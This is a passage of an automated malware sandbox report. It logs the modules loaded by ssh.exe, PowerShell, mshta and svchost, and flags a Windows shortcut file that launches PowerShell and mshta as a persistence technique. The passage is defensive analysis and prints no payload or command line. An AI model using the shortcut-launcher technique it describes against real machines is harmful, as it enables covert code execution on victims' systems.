Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: DypA6KbLrn.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC540327 pushad ; iretd 4_2_00007FFAAC540346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC54018D push ds; iretd 4_2_00007FFAAC5401B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC540347 push esi; iretd 4_2_00007FFAAC540376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC5419BA pushad ; ret 4_2_00007FFAAC5419C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC5400AD push ds; iretd 4_2_00007FFAAC5401B6

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
